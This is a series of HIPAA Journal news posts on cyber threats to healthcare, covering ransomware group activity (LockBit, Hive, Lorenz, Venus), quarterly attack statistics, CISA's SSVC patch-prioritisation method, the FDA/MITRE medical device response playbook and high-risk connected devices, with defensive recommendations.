There was a slight downturn in ransomware attacks in Q3, although it is too early to tell if that downward trend will continue. Even with the reduction in attacks, ransomware is still the biggest cyber threat faced by organizations, and the attacks are among the costliest cybersecurity incidents to mitigate. Attacks on the healthcare industry continue to be conducted in high numbers, with several groups targeting the sector, even though the attacks have the potential to result in loss of life.

Guidepoint Security’s Research and Intelligence Team (GRIT) has been tracking the activity of ransomware gangs and identified 27 active ransomware groups in Q3, a slight decrease from Q2 when there were 30 groups conducting attacks. In Q3, there were 568 publicly posted ransomware victims – a 2.2% decrease from the 581 victims publicly posted in Q2. In Q3, new victims were publicly posted at a rate of 6.24 per day. Of course, there are some caveats with these findings. Some ransomware groups do not add all of their victims to their data leak sites, and some offer not to publicly release any information about an attack if the ransom is paid promptly. That said, figures published by the ransomware remediation firm Coveware indicate the number of organizations paying ransoms is declining.

The report shows that the ransomware threat is greatest in the United States, which is the most targeted country with 38.9% of total victims, followed by France (6.2%), and the United Kingdom (5.6%). Attacks in Spain increased significantly in Q3, which saw the country rise to 4^th spot with 4.9% of attacks. Attacks are also being conducted more widely, with 16 countries targeted for the first time this year in Q3, and 6 of those countries targeted for the first time ever.

The most prolific ransomware groups in Q3 were LockBit, BlackBasta, Hive, AlphV, Bianlian, and Vice Society, with LockBit by far the most prolific operation. LockBit is known to target the healthcare sector, and a warning about the group was recently issued by the Health Sector Cybersecurity Coordination Sector (HC3). The group increased the number of attacks in September compared to the previous two months, and accounted for 42% of all publicly posted victims, increasing from 211 victims in Q2 to 235 in Q3.

Blackbasta was the second most prolific group and there was a 32% increase in victims in Q3, with Hive in third place with attacks increasing by 104% in the quarter. A warning was also issued by HC3 about Hive recently. Hive actively targets the healthcare industry, with 12.8% of its victims in the healthcare and public health (HPH) sector – twice the percentage of HPH sector victims as LockBit. While the healthcare industry is actively targeted by several ransomware groups such as LockBit and Hive, some choose not to attack the sector. Even so, the industry ranked third in terms of victim count in Q3, with LockBit, Hive, and BianLian claiming the highest number of victims. Manufacturing ranked first for publicly posted victims, with technology ranking second.

So far this year, 44 ransomware groups have been observed conducting attacks, and there have been 1,846 publicly posted victims. 8 new ransomware operations emerged in Q3, including Sparta, which made the top 10 in terms of the number of victims. The group has so far conducted all of its attacks on organizations in Spain. Combined, two previously highly active groups, Vice Society and Quantum, decreased attacks by 48% and 57% respectively in Q3.

The post Healthcare Ransomware Threat High Despite Slight Downturn in Attacks in Q3 appeared first on HIPAA Journal.

The healthcare and public health sector (HPH) has been warned about the threat of ransomware attacks by the Lorenz threat group, which has conducted several attacks in the United States over the past two years, with no sign that attacks are slowing.

Lorenz ransomware is human-operated and is deployed after the threat actors have gained access to networks and have exfiltrated data. Once access to the network is gained, the group is known to customize its executable code and tailor it for each targeted organization. The Lorenz actors maintain persistence and conduct extensive reconnaissance over an extended period of time before deploying ransomware to encrypt files. The group engages in double extortion tactics, where sensitive data is exfiltrated prior to file encryption and ransom demands are issued to prevent the sale or publication of that data, in addition to payment being required to obtain the keys to decrypt files.

Many ransomware threat actors steal data and threaten to publish the stolen files on a data leak site if the ransom is not paid. The process used by Lorenz is somewhat unique. If after attempting to engage with a victim the ransom payment is not forthcoming, the group attempts to sell the stolen data to other threat actors and competitors. If the ransom is still not paid, Lorenz publishes password-protected archives containing the stolen data on its data leak site. If the group is unable to monetize the stolen data, the passwords for the archives are then published, which allows anyone to access and download the stolen data. There have been cases where the group has maintained access to victims’ networks and has sold that access to other threat groups.

Lorenz engages in big game hunting, most commonly targeting large organizations, with the ransom demands typically in the range of $500,000 to $700,000. There have been no known attacks on non-enterprise targets, and the majority of victims have been English-speaking. In contrast to most other ransomware gangs, relatively little is known about this group. Methods known to have been used by the group to gain initial access to victims’ networks include phishing, compromising remote access technologies such as RDP and VPNs, exploiting unpatched vulnerabilities in software and operating systems, and conducting attacks on managed service providers (MSPs), and then pivoting to attack MSP clients.

The Health Sector Cybersecurity Coordination Center (HC3) Analyst Note includes references, known Indicators of Compromise, and other resources that can be used by network defenders to improve their defenses against Lorenz ransomware attacks.

The post HPH Sector Warned About Lorenz Ransomware Group appeared first on HIPAA Journal.

The Hive ransomware-as-a-service (RaaS) operation first emerged in June 2021 and has aggressively targeted the health and public health sector (HPH) and continues to do so. From June 2021 until November 2022, the group conducted attacks on more than 1,300 organizations worldwide, generating more than $100 million in ransom payments.

Victims in the HPH sector include the public health system in Costa Rica, Partnership HealthPlan of California, Memorial Health System, Missouri Delta Medical Center, Southwell, Hendry Regional Medical Center, and Lake Charles Memorial Health System, with the latter currently recovering from the attack that occurred this month. The attacks put patient safety at risk and have forced hospitals to divert ambulances, cancel surgeries, postpone appointments, and close urgent care units.

On November 17, 2022, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) issued a joint alert to the HPH sector warning about the risk of attacks and shared Indicators of Compromise (IoCs) and details of the tactics, techniques, and procedures (TTPs) used by the group, along with recommended mitigations for blocking, detecting, and mitigating attacks.

Hive has sophisticated capabilities, engages in double extortion tactics, and publicly releases stolen data on its leak site when victims refuse to pay the ransom. The group has been known to reinfect victims that have attempted to recover without paying the ransom. As a RaaS operation, affiliates are recruited to conduct attacks on behalf of the gang for a cut of the ransom payments they generate, with the affiliates having areas of expertise for gaining access to victims’ networks.

The most common methods used for initial access are exploiting vulnerabilities in Remote Desktop Protocol (RDP) and other remote network connection protocols, compromising Virtual Private Networks (VPNs), conducting phishing attacks using malicious attachments, and exploiting unpatched vulnerabilities, including the CVE-2020-12812 vulnerability to access FortiOS servers, and the Microsoft Exchange Server vulnerabilities CVE-2021-31207, CVE-2021-34473, CVE-2021-34523.

Once access to networks has been gained, the group identifies processes related to backups, antivirus/anti-spyware, and file copying, and terminates those processes. Volume shadow copy services are stopped and all existing shadow copies are deleted, and Windows event logs are deleted, specifically the System, Security, and Application logs. Prior to encryption, virus definitions are removed and all portions of Windows Defender and other common antivirus programs are disabled in the system registry, and sensitive data is exfiltrated using Rclone and the cloud storage service Mega.nz. The group operates a live chat service to engage with victims and has also been known to contact victims by phone and email to discuss payment. Ransom demands can be considerable, ranging from several thousand to millions of dollars.

Healthcare organizations are urged to read the joint security alert, monitor their systems using the provided IoCs, harden defenses against the identified TTPs, and implement the recommended mitigations.

The post Feds Issue Warning to HPH Sector About Aggressive Hive Ransomware Group appeared first on HIPAA Journal.

There was a global increase in cyberattacks in Q3, 2022, with attacks rising by 28% compared to the corresponding period last year. Attacks are now occurring at a rate of 1,130 per week, on average, according to Check Point Research.

Education was the most extensively targeted sector in Q3, experiencing an 18% rise in attacks, followed by government/military which saw a 20% increase. Healthcare was the third most targeted sector with an average of 1,426 attacks per month, but saw the second highest percentage increase in attacks, increasing by 60% from 2021. Healthcare also experienced the highest number of ransomware attacks out of any sector in Q3, with 1 in 42 healthcare organizations experiencing an attack – a 5% increase from Q3, 2021. This was despite an 8% global fall in ransomware attacks in Q3.

While the number of attacks has increased compared to last year, it appears that the attacks are starting to plateau, as the percentage increase is nowhere near as sharp as in 2021. Check Point suggests that this could be due to the increased investment in cybersecurity by enterprises, and the increased focus of governments on pursuing hackers and ransomware gangs and bringing them to justice.

“Hackers and attack groups have gained momentum and confidence, luring and attacking what seems to be endless targets around the globe,” wrote the researchers. In Q3, several major attacks were reported, including a cyberattack on the second largest school district in the United States – LA Unified School District. Australia has also seen more than its fair share of attacks, having experienced one of the largest data breaches in the country’s history – The attack on the telecoms company Optus, which was closely followed by a ransomware attack on Medibank – the largest health insurer in the country. The ANZ (Australia and New Zealand) region saw the highest percentage increase in cyberattacks in Q3, with a 72% increase, followed by North America, which saw a 47% increase in cyberattacks to an average of 849 attacks on organizations per week.

The increase in attacks shows how important it is to invest in cybersecurity and continuously assess and improve defenses. Check Point recommends focusing on prevention and ensuring that cybersecurity best practices are followed, rather than concentrating on threat detection once networks have been breached.

Many of these cyberattacks targeted employees, with phishing one of the most common ways that threat actors gain initial access to networks and spread ransomware and malware. It is important to ensure that employees receive adequate training, which should be provided frequently to reinforce cybersecurity best practices and train employees how to recognize and avoid threats such as phishing. Modern email filtering solutions should also be deployed that are capable of behavioral analysis of attachments to identify zero-day malware threats, through sandboxing technology. Healthcare organizations should also consider signing up for real-time threat intelligence, which can help to actively guard against zero-day phishing campaigns, as well as employ URL filtering to block access to known malicious websites.

Vulnerabilities are commonly exploited and it can be difficult for security teams to keep on top of patching and software updates. Prioritizing patching is vital to ensure that the most serious vulnerabilities are addressed first. CISA has recently published a methodology that can be adopted for improving patch management efficiency. In healthcare especially, anti-ransomware technology should be deployed that can rapidly detect signs of ransomware and uncover running mutations of known and unknown malware families by using behavioral analysis and generic rules.

The post Healthcare Sees 60% YoY Increase in Cyberattacks appeared first on HIPAA Journal.

In the event of a cyberattack that impacts the functionality of medical devices, a rapid and effective response is essential to ensure patient safety and the continuity of clinical operations. While healthcare organizations have practiced protocols that can be implemented immediately in the event of a natural disaster such as a hurricane, they tend to be less well prepared to deal with cybersecurity incidents. Earlier this month, Senator Mark Warner (D-VA), Chairman of the Senate Select Committee on Intelligence, published a white paper – Cybersecurity is Patient Safety – highlighting this problem, which he said is due to an outdated mode of thinking, where cybersecurity is viewed as a secondary or tertiary concern, and that is something that needs to change.

The key to a rapid recovery from a cyberattack is preparedness. Healthcare organizations need to treat cyberattacks as a primary concern and ensure they have a tried and tested plan for responding to attacks, and protocols that can be implemented immediately when a cyberattack is detected. Following the WannaCry ransomware attacks in 2017, which caused massive disruption to clinical operations at several U.S. healthcare organizations, the Food and Drug Administration (FDA) asked MITRE to develop a Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook to help hospitals and healthcare delivery organizations (HDOs) develop a cybersecurity preparedness and response framework.

According to MITRE, “[The playbook] supplements HDO emergency management and/or incident response capabilities with regional preparedness and response recommendations for medical device cybersecurity incidents.” Since the playbook was published in 2018, cyberattacks on the healthcare sector have continued to increase in number and sophistication. From the middle of 2020 to the end of 2021, 82% of healthcare systems reported a cyber incident, and 34% of those incidents were ransomware attacks. Those attacks were often sophisticated and impacted multiple IT systems, resulting in widespread disruption to business operations, and in many cases that disruption continued for weeks or months.

In light of the increase in cyberattacks and the changing threat landscape, the FDA contacted MITRE to reach out to stakeholders to identify gaps in the playbook, challenges, and additional resources that had become available since the original publication of the playbook. An updated version of the playbook has now been released.

The playbook focuses on preparedness and response for medical device cybersecurity issues that impact medical device functions, with the updated version emphasizing the importance of having a diverse team participating in cybersecurity preparedness and response exercises. Cyberattacks impact many individuals, so it is important that those individuals participate in preparedness exercises, including clinicians, healthcare technology management professionals, the IT team, emergency response, and risk management and facilities staff.

Version 2.0 of the playbook highlights considerations for widespread impacts and extended downtimes that are common following ransomware attacks, which benefit from the use of regional response models and partners. MITRE has also added a resource appendix that makes it easier to find tools, references, and other resources to help healthcare organizations prepare for and respond to medical device cybersecurity incidents, including ransomware attacks.

In addition to the updated Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook, a Playbook Quick Start Companion Guide has also been released, which is a shorter version of the playbook that discusses preparedness and response activities that health care organizations might want to start when developing their medical device incident response program.

It may not be possible to prevent cyberattacks, but by preparing and practicing the incident response, the severity of those attacks and the impact they have on clinical operations can be greatly reduced.

The post FDA, MITRE Update Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook appeared first on HIPAA Journal.

CISA has issued a decision tree methodology that can be adopted by healthcare organizations to help them develop an efficient and effective vulnerability management program.

The Importance of an Efficient Patch Management Program

When it comes to vulnerability management, the best practice is to patch promptly. When software updates and patches are released, they should be applied as soon as possible to prevent bad actors from exploiting the flaws.  In practice, promptly patching all vulnerabilities can be a major challenge due to the sheer number of patches and software updates that are being released, and nor is it wise, as vulnerabilities are not all equal. Some are much more likely to be exploited than others and the impact of the successful exploitation of vulnerabilities can vary considerably. When it comes to vulnerability management, IT teams need to prioritize patching and deal with critical and actively exploited vulnerabilities first.

Healthcare organizations with mature vulnerability management programs are more likely to have efficient processes for vulnerability management. They will assess the severity of each vulnerability, the impact exploitation of the vulnerability will have, whether the vulnerability is being actively exploited or if a proof-of-concept(PoC) exploit is in the public domain, and therefore determine the likelihood of a vulnerability being exploited. After assessing each vulnerability, they can then effectively prioritize patching. Smaller healthcare organizations may struggle with assessing and prioritizing patching and the consequences of getting things wrong can be severe. Important updates may be missed, which leaves the door wide open for hackers.

A Decision Tree Method for Assessing and Remediating Software Vulnerabilities

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) released guidance to help organizations prioritize patching and shared a Stakeholder-Specific Vulnerability Categorization (SSVC) vulnerability management methodology that can be adopted to ensure vulnerabilities are accurately assessed, allowing remediation efforts to be prioritized

CISA Executive Assistant Director (EAD) Eric Goldstein explained in a recent blog post that there are three key steps needed to advance the vulnerability management ecosystem. They are:

1) To introduce greater automation into vulnerability management.

2) To make it easier for organizations to understand whether a given product is impacted by a vulnerability through widespread adoption of the Vulnerability Exploitability eXchange (VEX).

3) To help organizations more effectively prioritize vulnerability management resources through the use of SSVC, including prioritizing vulnerabilities based on CISA’s Known Exploited Vulnerabilities (KEV) catalog.

The SSVC system was developed by CISA and the Software Engineering Institute (SEI) at Carnegie Mellon University, with CISA then developing its own custom version of the SSVC for assessing and addressing vulnerabilities that affect government and critical infrastructure organizations.

The SSVC can be used by organizations to assess vulnerabilities based on five values: The exploitation status (is it currently being exploited), the technical impact (how serious is the vulnerability), whether the vulnerability is automatable, the mission prevalence, and the public well-being impact. Vulnerabilities can then be categorized into one of four categories:

• Track – No immediate action is required, but the vulnerability should be tracked and reassessed if further information becomes available, with the vulnerability updated within standard timeframes.
• Track* – No immediate action is required, but there are characteristics that require closer monitoring for changes. These vulnerabilities should be remediated within standard time frames.
• Attend – The vulnerability requires attention from the organization’s internal, supervisory-level individuals. Necessary actions include requesting assistance or information about the vulnerability and potentially publishing a notification internally and/or externally. The vulnerability needs to be remediated sooner than standard update timelines.
• Act – The vulnerability requires attention from the organization’s internal, supervisory-level and leadership-level individuals. Necessary actions include requesting assistance or information about the vulnerability and publishing a notification either internally and/or externally. Internal groups would meet to determine the overall response and then execute agreed-upon actions, with the vulnerability remediated as soon as possible.

CISA recommends using the SVCC alongside CISA’s Known Exploited Vulnerabilities (KEV) Catalog, the Common Security Advisory Framework (CSAF) machine-readable security advisories, and the Vulnerability Exploitability eXchange (VEX). When these are all used together, the window cyber threat actors have to exploit networks will be significantly reduced.

The SVCC and the guide on usage can be viewed here.

The post CISA Releases Decision Tree Methodology for Assessing and Remediating Software Vulnerabilities appeared first on HIPAA Journal.

The Health Sector Cybersecurity Coordination Center (HC3) has recently shared details of the tactics, techniques, and procedures associated with Venus ransomware attacks, and has made several recommendations on mitigations that healthcare organizations can implement to improve their defenses against attacks. Venus ransomware, aka GOODGAME, is a relatively new threat, having first been identified in mid-August 2022; however, the ransomware has been used globally in attacks and there are now submissions of the ransomware variant every day.

While the threat group is not known to specifically target the healthcare sector, there has been at least one attack on the healthcare industry in the United States. The primary method of initial access, as is the case with several ransomware groups, is exploiting publicly exposed Remote Desktop services to encrypt Windows devices, including Remote Desktop on standard and non-standard TCP ports.

Once access has been gained, the ransomware will attempt to terminate 39 processes associated with database servers and Microsoft Office applications. Event logs will be deleted along with Shadow Copy Volumes, and Data Execution Prevention will be disabled on compromised endpoints. Files are encrypted using AES and RSA algorithms, and encrypted files have the .venus extension, with a goodgamer filemarker and other information added to the file.

The threat actor claims to download data before encrypting files, although no data leak site has been associated with the group. This also does not appear to be a ransomware-as-a-service operation, although based on the number of attacks and IP addresses associated with group it appears to consist of several individuals.

Since publicly exposed Remote Desktop/RDP is attacked, healthcare organizations should ensure these services are protected by a firewall. Windows 11 users will be protected against brute force attacks to some degree, as login attempts are automatically limited. For other Windows versions, rate limiting should be implemented, as this will limit the number of attempts an attacker can make to try to connect to Remote Desktop services. Strong, unique passwords should be set for Remote Desktop services, multi-factor authentication (MFA) should be enforced, and consider putting RDP behind a Virtual Private Network (VPN).

The damage caused by a successful attack can be greatly limited by implementing network segmentation, and best practices should be followed for data backups – The 3-2-1 approach is recommended: Create one primary backup and two copies, store the backups on at least 2 different media, with one copy stored securely offsite. Backups should ideally be encrypted, and certainly password-protected, and should not be accessible from the system where the data resides.

While these attacks target Remote Desktop services, security measures should be implemented to protect against other attack vectors such as email and the exploitation of software vulnerabilities. Ensure an email security solution is in place, consider adding a banner to emails from external sources, disable hyperlinks in emails, provide regular security awareness training to the workforce, ensure patches are applied promptly, make sure the latest version of software is installed, and ensure that administrator access is required to install software. Antivirus software should also be installed on all endpoints.

Further information can be found in the HC3 Venus Ransomware Analyst Note.

The post HC3 Sounds Alarm About Venus Ransomware appeared first on HIPAA Journal.

The number of connected devices being used in hospitals continues to grow and while these devices can improve efficiency, safety, and patient outcomes, they have also substantially increased the attack surface, and many of these devices either lack appropriate security features or are not correctly configured.

According to a recent Microsoft-sponsored study by the Ponemon Institute into the current state of IoT/OT cybersecurity, 65% of organizations said their IoT/OT devices were one of the least secured parts of their networks, with 50% reporting an increase in attacks on IoT/OT devices. 88% of respondents said they have IoT devices that are accessible over the Internet, and 51% have OT devices accessible over the Internet. Cybercriminals are increasingly attacking these devices as they are a weak point that can be easily exploited. These devices are the target of malware, ransomware, and are among the main initial access points for malicious actors.

In 2020, Forescout analyzed the types of devices used in enterprise networks to determine which pose the highest risk, and this month has published an updated version of the report. Most of the devices that were rated high risk remain on the updated list, and include networking equipment, VoIP, IP cameras, and programmable logic controllers (PLCs), with hypervisors and human-machine interfaces (HMIs) added this year.

The majority of the riskiest devices are on the list because they are frequently exposed on the Internet or because they are critical to business operations, and vulnerabilities are present in all devices. Almost all organizations rely on a combination of IT, IoT, and OT, with healthcare also relying on IoMT devices. That means almost all organizations face a growing attack surface as they have at least one type of risky device connected to their network.

The riskiest devices in each category are detailed in the table below:

Many of the devices included in the list are difficult to patch and manage, which means vulnerabilities are not addressed quickly. IoMT devices are risky because they can provide access to internal networks and can contain valuable patient information, and attacks on these devices can have an impact on healthcare delivery and patient safety. Attacks have been conducted on hospitals that have resulted in fetal monitors being disabled, and in 2020, several attacks were conducted on radiation information systems.

DICOM workstations, nuclear medicine systems, imaging devices, and PACS are all used for medical imaging, and as such can contain highly sensitive patient data. They also commonly run legacy IT operating systems and have extensive network capability for easy sharing of medical imaging data, most commonly using the DICOM standard for sharing files. DICOM was not developed with security in mind, and while DICOM does permit the encryption of data in transit, it is up to individual healthcare organizations to configure encryption. Encryption is not activated in many hospitals, which means medical images are transmitted in clear text and can easily be intercepted and tampered with to include malware. Patient monitors are also amongst the most vulnerable IoMT devices as they commonly communicate using unencrypted protocols, which means communications could be easily intercepted and tampered with. Tampering could prevent alerts from being received.

The key to managing risk is to understand how the attack surface is growing and to conduct a comprehensive risk assessment to understand where the vulnerabilities exist. Those risks can then be subjected to a risk management process and can be reduced to a low and acceptable level. “Once you understand your attack surface, you need to mitigate risk with automated controls that do not rely only on security agents and that apply to the whole enterprise instead of silos like the IT network, the OT network or specific types of IoT devices,” suggests Forescout.

The post The Riskiest Connected Devices in Healthcare appeared first on HIPAA Journal.